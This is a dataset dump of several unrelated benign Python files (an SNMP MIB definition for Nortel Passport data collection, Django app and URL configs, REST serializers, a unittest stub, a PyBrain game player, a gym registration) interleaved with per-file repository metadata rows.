if mibBuilder.loadTexts: mscColSpControlStatus.setDescription('If supported by the component, this attribute indicates the OSI Control status of the component. Note that, even though it is defined as a multi-valued set, at most one value is shown to the user. When no values are in the set, this indicates that either the attribute is not supported or that none of the status conditions described below are present. The value subjectToTest indicates the resource is available but tests may be conducted simultaneously at unpredictable times, which may cause it to exhibit unusual characteristics. The value partOfServicesLocked indicates that part of the service is restricted from users of a resource. The adminState is unlocked. The value reservedForTest indicates that the component is administratively unavailable because it is undergoing a test procedure. The adminState is locked. The value suspended indicates that the service has been administratively suspended. Description of bits: subjectToTest(0) partOfServicesLocked(1) reservedForTest(2) suspended(3)')
mscColSpAlarmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpAlarmStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpAlarmStatus.setDescription('If supported by the component, this attribute indicates the OSI Alarm status of the component. Note that, even though it is defined as a multi-valued set, at most one value is shown to the user. When no values are in the set, this indicates that either the attribute is not supported or that none of the status conditions described below are present. The value underRepair indicates the component is currently being repaired. The operationalState is enabled or disabled. The value critical indicates one or more critical alarms are outstanding against the component. Other, less severe, alarms may also be outstanding. The operationalState is enabled or disabled. The value major indicates one or more major alarms are outstanding against the component. Other, less severe, alarms may also be outstanding. The operationalState is enabled or disabled. The value minor indicates one or more minor alarms are outstanding against the component. Other, less severe, alarms may also be outstanding. The operationalState is enabled or disabled. The value alarmOutstanding generically indicates that an alarm of some severity is outstanding against the component. Description of bits: underRepair(0) critical(1) major(2) minor(3) alarmOutstanding(4)')
mscColSpStandbyStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 15))).clone(namedValues=NamedValues(("hotStandby", 0), ("coldStandby", 1), ("providingService", 2), ("notSet", 15))).clone('notSet')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpStandbyStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStandbyStatus.setDescription('If supported by the component, this attribute indicates the OSI Standby status of the component. The value notSet indicates that either the attribute is not supported or that none of the status conditions described below are present. Note that this is a non-standard value, used because the original specification indicated this attribute was set-valued and thus, did not provide a value to indicate that none of the other three are applicable. The value hotStandby indicates that the resource is not providing service but will be immediately able to take over the role of the resource to be backed up, without initialization activity, and containing the same information as the resource to be backed up. The value coldStandby indicates the resource is a backup for another resource but will not be immediately able to take over the role of the backed up resource and will require some initialization activity. The value providingService indicates that this component, as a backup resource, is currently backing up another resource.')
mscColSpUnknownStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("false", 0), ("true", 1))).clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpUnknownStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpUnknownStatus.setDescription('This attribute indicates the OSI Unknown status of the component. The value false indicates that all of the other OSI State and Status attribute values can be considered accurate. The value true indicates that the actual state of the component is not known for sure.')
mscColSpOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12), )
if mibBuilder.loadTexts: mscColSpOperTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpOperTable.setDescription('This group contains the operational attributes specific to a DCS Spooler.')
mscColSpOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpOperEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpOperEntry.setDescription('An entry in the mscColSpOperTable.')
mscColSpSpoolingFileName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12, 1, 1), AsciiString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpSpoolingFileName.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpSpoolingFileName.setDescription('When spooling is on, this attribute contains the name of the open file into which data is currently being spooled. When spooling is off, the value of this attribute is the empty string.')
mscColSpStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13), )
if mibBuilder.loadTexts: mscColSpStatsTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStatsTable.setDescription('This group specifies the statistics operational attributes of the DCS Collector, Agent and Spooler components.')
mscColSpStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpStatsEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStatsEntry.setDescription('An entry in the mscColSpStatsTable.')
mscColSpCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpCurrentQueueSize.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpCurrentQueueSize.setDescription('This gauge contains the current number of records held by this DCS component.')
mscColSpRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpRecordsRx.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRecordsRx.setDescription('This counter contains the cumulative number of records received by a DCS component, from applications which send data to it, since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColSpRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpRecordsDiscarded.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRecordsDiscarded.setDescription('This is the cumulative number of records discarded by this DCS component since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColAg = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3))
mscColAgRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1), )
if mibBuilder.loadTexts: mscColAgRowStatusTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRowStatusTable.setDescription('*** THIS TABLE CURRENTLY NOT IMPLEMENTED *** This entry controls the addition and deletion of mscColAg components.')
mscColAgRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex"))
if mibBuilder.loadTexts: mscColAgRowStatusEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRowStatusEntry.setDescription('A single entry in the table represents a single mscColAg component.')
mscColAgRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRowStatus.setDescription('This variable is used as the basis for SNMP naming of mscColAg components. These components cannot be added nor deleted.')
mscColAgComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgComponentName.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgComponentName.setDescription("This variable provides the component's string name for use with the ASCII Console Interface")
mscColAgStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgStorageType.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgStorageType.setDescription('This variable represents the storage type value for the mscColAg tables.')
mscColAgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15)))
if mibBuilder.loadTexts: mscColAgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgIndex.setDescription('This variable represents the index for the mscColAg tables.')
mscColAgStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10), )
if mibBuilder.loadTexts: mscColAgStatsTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgStatsTable.setDescription('*** THIS TABLE CURRENTLY NOT IMPLEMENTED *** This group specifies the statistics operational attributes of the DCS Collector, Agent and Spooler components.')
mscColAgStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex"))
if mibBuilder.loadTexts: mscColAgStatsEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgStatsEntry.setDescription('An entry in the mscColAgStatsTable.')
mscColAgCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgCurrentQueueSize.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgCurrentQueueSize.setDescription('This gauge contains the current number of records held by this DCS component.')
mscColAgRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgRecordsRx.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRecordsRx.setDescription('This counter contains the cumulative number of records received by a DCS component, from applications which send data to it, since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColAgRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 10, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgRecordsDiscarded.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRecordsDiscarded.setDescription('This is the cumulative number of records discarded by this DCS component since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColAgAgentStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11), )
if mibBuilder.loadTexts: mscColAgAgentStatsTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgAgentStatsTable.setDescription('*** THIS TABLE CURRENTLY NOT IMPLEMENTED *** This group contains the statistical attributes specific to the DCS Agent components.')
mscColAgAgentStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColAgIndex"))
if mibBuilder.loadTexts: mscColAgAgentStatsEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgAgentStatsEntry.setDescription('An entry in the mscColAgAgentStatsTable.')
mscColAgRecordsNotGenerated = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 3, 11, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColAgRecordsNotGenerated.setStatus('mandatory')
if mibBuilder.loadTexts: mscColAgRecordsNotGenerated.setDescription('This attribute counts the records of a particular event type on this Card which could not be generated by some application due to some problem such as insufficient resources. One cannot tell exactly which event could not be generated, nor which application instance tried to generate it, but when this count increases, it is an indicator that some re-engineering may be required and will provide some idea as to why a record is missing. This counter wraps to 0 when the maximum value is exceeded.')
dataCollectionGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1))
dataCollectionGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1))
dataCollectionGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1, 3))
dataCollectionGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 1, 1, 3, 2))
dataCollectionCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3))
dataCollectionCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1))
dataCollectionCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1, 3))
dataCollectionCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14, 3, 1, 3, 2))
mibBuilder.exportSymbols("Nortel-MsCarrier-MscPassport-DataCollectionMIB", mscColSpComponentName=mscColSpComponentName, dataCollectionCapabilitiesCA02=dataCollectionCapabilitiesCA02, mscColAgCurrentQueueSize=mscColAgCurrentQueueSize, mscColProvEntry=mscColProvEntry, mscColAgRowStatus=mscColAgRowStatus, mscColTimesRowStatus=mscColTimesRowStatus, mscColRowStatusTable=mscColRowStatusTable, mscColStorageType=mscColStorageType, mscColSpStorageType=mscColSpStorageType, mscColSpCurrentQueueSize=mscColSpCurrentQueueSize, mscColSpRowStatusEntry=mscColSpRowStatusEntry, mscColSpRowStatusTable=mscColSpRowStatusTable, mscColStatsEntry=mscColStatsEntry, mscColProvTable=mscColProvTable, mscColRecordsDiscarded=mscColRecordsDiscarded, mscColTimesValue=mscColTimesValue, mscColPeakRowStatus=mscColPeakRowStatus, mscColSpSpoolingFileName=mscColSpSpoolingFileName, mscColRecordsRx=mscColRecordsRx, mscColSpSpooling=mscColSpSpooling, mscColAgStatsTable=mscColAgStatsTable, dataCollectionCapabilitiesCA=dataCollectionCapabilitiesCA, mscColLastEntry=mscColLastEntry, mscColSpRowStatus=mscColSpRowStatus, dataCollectionGroupCA02=dataCollectionGroupCA02, mscColAg=mscColAg, mscColAgentQueueSize=mscColAgentQueueSize, mscColAgComponentName=mscColAgComponentName, mscColAgAgentStatsTable=mscColAgAgentStatsTable, mscColSpStateTable=mscColSpStateTable, mscColSpMaximumNumberOfFiles=mscColSpMaximumNumberOfFiles, mscColSpStatsTable=mscColSpStatsTable, mscColPeakValue=mscColPeakValue, mscColSpOperEntry=mscColSpOperEntry, mscColAgIndex=mscColAgIndex, mscColSpProceduralStatus=mscColSpProceduralStatus, dataCollectionMIB=dataCollectionMIB, dataCollectionGroupCA=dataCollectionGroupCA, mscColSpAvailabilityStatus=mscColSpAvailabilityStatus, mscColTimesTable=mscColTimesTable, mscColSpRecordsRx=mscColSpRecordsRx, mscColRowStatusEntry=mscColRowStatusEntry, mscColSpProvEntry=mscColSpProvEntry, dataCollectionCapabilities=dataCollectionCapabilities, mscColSpIndex=mscColSpIndex, mscColIndex=mscColIndex, mscColSpOperationalState=mscColSpOperationalState, mscColSpStateEntry=mscColSpStateEntry, mscColLastTable=mscColLastTable, mscColAgRecordsRx=mscColAgRecordsRx, mscColAgRowStatusTable=mscColAgRowStatusTable, mscColSp=mscColSp, mscColSpUnknownStatus=mscColSpUnknownStatus, mscColAgStatsEntry=mscColAgStatsEntry, mscColLastValue=mscColLastValue, mscColSpStandbyStatus=mscColSpStandbyStatus, dataCollectionGroup=dataCollectionGroup, mscColAgRowStatusEntry=mscColAgRowStatusEntry, mscColStatsTable=mscColStatsTable, mscColSpProvTable=mscColSpProvTable, mscColAgAgentStatsEntry=mscColAgAgentStatsEntry, mscColSpAdminState=mscColSpAdminState, mscColComponentName=mscColComponentName, mscColCurrentQueueSize=mscColCurrentQueueSize, mscColPeakEntry=mscColPeakEntry, mscColAgRecordsDiscarded=mscColAgRecordsDiscarded, mscColRowStatus=mscColRowStatus, mscColPeakTable=mscColPeakTable, mscColAgRecordsNotGenerated=mscColAgRecordsNotGenerated, dataCollectionCapabilitiesCA02A=dataCollectionCapabilitiesCA02A, mscCol=mscCol, mscColSpStatsEntry=mscColSpStatsEntry, mscColSpRecordsDiscarded=mscColSpRecordsDiscarded, mscColTimesEntry=mscColTimesEntry, mscColSpControlStatus=mscColSpControlStatus, mscColSpUsageState=mscColSpUsageState, dataCollectionGroupCA02A=dataCollectionGroupCA02A, mscColAgStorageType=mscColAgStorageType, mscColSpAlarmStatus=mscColSpAlarmStatus, mscColSpOperTable=mscColSpOperTable)
| 191.15812 | 3,370 | 0.794617 | 5,734 | 44,731 | 6.198814 | 0.123474 | 0.045915 | 0.080351 | 0.009003 | 0.521044 | 0.398998 | 0.367854 | 0.362734 | 0.333924 | 0.310995 | 0 | 0.046845 | 0.109007 | 44,731 | 233 | 3,371 | 191.978541 | 0.844988 | 0.008629 | 0 | 0 | 0 | 0.119469 | 0.480512 | 0.034103 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.084071 | 0.039823 | 0 | 0.039823 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
6b1986265c356937240c8f049e4c27f556e3ad32 | 203 | py | Python | python_web_framework_project_defense/python_web_framework_project_defense/extended_user_auth/apps.py | Xamaneone/Django-Projects | 4fac8659680a6448bb55bce008bfd0eac1ad1f6d | [
"MIT"
] | null | null | null | python_web_framework_project_defense/python_web_framework_project_defense/extended_user_auth/apps.py | Xamaneone/Django-Projects | 4fac8659680a6448bb55bce008bfd0eac1ad1f6d | [
"MIT"
] | null | null | null | python_web_framework_project_defense/python_web_framework_project_defense/extended_user_auth/apps.py | Xamaneone/Django-Projects | 4fac8659680a6448bb55bce008bfd0eac1ad1f6d | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class ExtendedUserAuthConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'python_web_framework_project_defense.extended_user_auth'
| 29 | 68 | 0.82266 | 24 | 203 | 6.625 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108374 | 203 | 6 | 69 | 33.833333 | 0.878453 | 0 | 0 | 0 | 0 | 0 | 0.413793 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6b2789562eb8efddec5ec7449dee11fe69846fac | 1,257 | py | Python | cloud_notes/urls.py | kiwiheretic/logos-v2 | 22739221a6d431322c809b7e17aba54f37eb9617 | [
"Apache-2.0"
] | 4 | 2015-02-20T08:11:59.000Z | 2019-05-15T23:48:11.000Z | cloud_notes/urls.py | kiwiheretic/logos-v2 | 22739221a6d431322c809b7e17aba54f37eb9617 | [
"Apache-2.0"
] | 58 | 2015-01-11T02:10:09.000Z | 2022-03-20T01:20:15.000Z | cloud_notes/urls.py | kiwiheretic/logos-v2 | 22739221a6d431322c809b7e17aba54f37eb9617 | [
"Apache-2.0"
] | 1 | 2016-06-15T00:49:44.000Z | 2016-06-15T00:49:44.000Z | # urls.py
from __future__ import absolute_import
from django.conf.urls import include, url
from haystack.generic_views import SearchView
from haystack.forms import SearchForm
from .views import MySearchView
import cloud_notes.views
# required to set an app name to resolve 'url' in templates with namespacing
app_name = "cloud_notes"
urlpatterns = [
url(r'^$', cloud_notes.views.list),
url(r'^new/', cloud_notes.views.new_note),
url(r'^preview/(\d+)', cloud_notes.views.preview),
url(r'^edit/(\d+)', cloud_notes.views.edit_note),
url(r'^trash/(\d+)', cloud_notes.views.trash_note),
url(r'^empty_trash/', cloud_notes.views.empty_trash),
url(r'^delete/(\d+)', cloud_notes.views.delete_note),
url(r'^upload/', cloud_notes.views.upload_note),
url(r'^export/', cloud_notes.views.export),
url(r'^export_all/', cloud_notes.views.export_all),
url(r'^import/', cloud_notes.views.import_file),
url(r'^import_all/', cloud_notes.views.import_all),
url(r'^folders/', cloud_notes.views.folders),
url(r'^hash_tags/', cloud_notes.views.hash_tags),
url(r'^download/(\d+)', cloud_notes.views.download),
url(r'^search/', cloud_notes.views.MySearchView.as_view(form_class = SearchForm), name='search_view'),
]
| 40.548387 | 106 | 0.718377 | 189 | 1,257 | 4.555556 | 0.285714 | 0.209059 | 0.296167 | 0.092915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117741 | 1,257 | 30 | 107 | 41.9 | 0.776375 | 0.065235 | 0 | 0 | 0 | 0 | 0.156143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.32 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
6b34b62ff9176d754e62eb3c435d235886456de0 | 224 | py | Python | sync_tests/test_upload.py | Tara-X/mirror-sync | 98b86c65a389682df8500085c15ef57dc5309569 | [
"MIT"
] | null | null | null | sync_tests/test_upload.py | Tara-X/mirror-sync | 98b86c65a389682df8500085c15ef57dc5309569 | [
"MIT"
] | 1 | 2021-06-01T22:06:38.000Z | 2021-06-01T22:06:38.000Z | sync_tests/test_upload.py | Tara-X/mirror-sync | 98b86c65a389682df8500085c15ef57dc5309569 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import sys
import unittest
class TestUpload(unittest.TestCase):
def test_upload(self):
pass
def test_remove(self):
pass
if __name__ == '__main__':
unittest.main()
| 13.176471 | 36 | 0.616071 | 26 | 224 | 4.923077 | 0.692308 | 0.109375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006061 | 0.263393 | 224 | 16 | 37 | 14 | 0.769697 | 0.089286 | 0 | 0.222222 | 0 | 0 | 0.039604 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0.222222 | 0.222222 | 0 | 0.555556 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
6b36941c3ad4d3977e550da048bd026bd39e5196 | 302 | py | Python | venv/Lib/site-packages/pybrain3/rl/environments/twoplayergames/capturegameplayers/randomplayer.py | ishatserka/MachineLearningAndDataAnalysisCoursera | e82e772df2f4aec162cb34ac6127df10d14a625a | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pybrain3/rl/environments/twoplayergames/capturegameplayers/randomplayer.py | ishatserka/MachineLearningAndDataAnalysisCoursera | e82e772df2f4aec162cb34ac6127df10d14a625a | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pybrain3/rl/environments/twoplayergames/capturegameplayers/randomplayer.py | ishatserka/MachineLearningAndDataAnalysisCoursera | e82e772df2f4aec162cb34ac6127df10d14a625a | [
"MIT"
] | null | null | null | __author__ = 'Tom Schaul, tom@idsia.ch'
from random import choice
from .captureplayer import CapturePlayer
class RandomCapturePlayer(CapturePlayer):
""" do random moves in the capture game"""
def getAction(self):
return [self.color, choice(self.game.getLegals(self.color))] | 25.166667 | 68 | 0.715232 | 36 | 302 | 5.888889 | 0.666667 | 0.084906 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18543 | 302 | 12 | 68 | 25.166667 | 0.861789 | 0.115894 | 0 | 0 | 0 | 0 | 0.091954 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0.166667 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 3 |
6b44f8e8ae27a08bdbd449c05fa181aea67c9352 | 3,241 | py | Python | storeAdjust/serializer.py | FreeGodCode/store | 1ea1d6f0d6030fb58bce9a4e2d428342a0c3ad19 | [
"MIT"
] | null | null | null | storeAdjust/serializer.py | FreeGodCode/store | 1ea1d6f0d6030fb58bce9a4e2d428342a0c3ad19 | [
"MIT"
] | 1 | 2021-03-05T15:00:38.000Z | 2021-03-05T15:00:38.000Z | storeAdjust/serializer.py | FreeGodCode/store | 1ea1d6f0d6030fb58bce9a4e2d428342a0c3ad19 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from . import models
class TransferRequestSerializer(serializers.ModelSerializer):
org_name = serializers.CharField(source='organization.org_name')
class Meta:
model = models.TransferRequest
fields = (
'id', 'str_identify', 'org_name', 'str_to_house', 'str_from_house', 'str_date', 'str_department',
'str_status','str_creator', 'str_creator_identify', 'str_created_at'
)
class TransferRequestDetailSerializer(serializers.ModelSerializer):
str_identify = serializers.CharField(source='transfer_request.str_identify')
trd_identify = serializers.CharField(source='material.material_identify')
trd_name = serializers.CharField(source='material.material_name')
trd_specification = serializers.CharField(source='material.material_specification')
trd_model = serializers.CharField(source='material.material_model')
trd_measure = serializers.CharField(source='material.measure_name')
class Meta:
model = models.TransferRequestDetail
fields = (
'id', 'str_identify', 'trd_identify', 'trd_name', 'trd_specification', 'trd_model', 'trd_measure',
'trd_num', 'trd_present_num', 'trd_used', 'trd_remarks'
)
class TransferRequestDetailToTransferDetailSerializer(serializers.ModelSerializer):
str_identify = serializers.CharField(source='transfer_request.str_identify')
td_identify = serializers.CharField(source='material.material_identify')
td_name = serializers.CharField(source='material.material_name')
td_specification = serializers.CharField(source='material.material_specification')
td_model = serializers.CharField(source='material.material_model')
td_measure = serializers.CharField(source='material.measure_name')
td_apply_num = serializers.CharField(source='trd_num')
class Meta:
model = models.TransferRequestDetail
fields = (
'id', 'str_identify', 'td_identify', 'td_name', 'td_specification', 'td_model', 'td_measure', 'td_apply_num'
)
class TransferSerializer(serializers.ModelSerializer):
org_name = serializers.CharField(source='organization.org_name')
class Meta:
model = models.Transfer
fields = (
'id', 'st_identify', 'org_name', 'st_to_house', 'st_from_house', 'st_date', 'st_status', 'st_creator',
'st_creator_identify', 'st_created_at'
)
class TransferDetailSerializer(serializers.ModelSerializer):
st_identify = serializers.CharField(source='transfer.st_identify')
td_identify = serializers.CharField(source='material.material_identify')
td_name = serializers.CharField(source='material.material_name')
td_specification = serializers.CharField(source='material.material_specification')
td_model = serializers.CharField(source='material.material_model')
td_measure = serializers.CharField(source='material.measure_name')
class Meta:
model = models.TransferDetail
fields = (
'id', 'str_identify', 'st_identify', 'td_identify', 'td_name', 'td_specification', 'td_model', 'td_measure',
'td_apply_num', 'td_real_num ', 'td_present_num', 'td_remarks'
) | 45.013889 | 120 | 0.724468 | 340 | 3,241 | 6.594118 | 0.144118 | 0.187333 | 0.243533 | 0.227475 | 0.689563 | 0.67083 | 0.67083 | 0.569135 | 0.569135 | 0.5281 | 0 | 0 | 0.161678 | 3,241 | 72 | 121 | 45.013889 | 0.825175 | 0 | 0 | 0.45614 | 0 | 0 | 0.320481 | 0.144664 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035088 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
860f15449ffd7b916eb81156f97cf4a7427d9bfc | 120 | py | Python | gym_antnest/__init__.py | unoti/aigym-antnest | 6dfcb2ddc2118edd64ba8b474510f2a20a67d6f9 | [
"MIT"
] | null | null | null | gym_antnest/__init__.py | unoti/aigym-antnest | 6dfcb2ddc2118edd64ba8b474510f2a20a67d6f9 | [
"MIT"
] | null | null | null | gym_antnest/__init__.py | unoti/aigym-antnest | 6dfcb2ddc2118edd64ba8b474510f2a20a67d6f9 | [
"MIT"
] | null | null | null | from gym.envs.registration import register
register(
id='antnest-v0',
entry_point='antnest.envs:AntNestEnv',
)
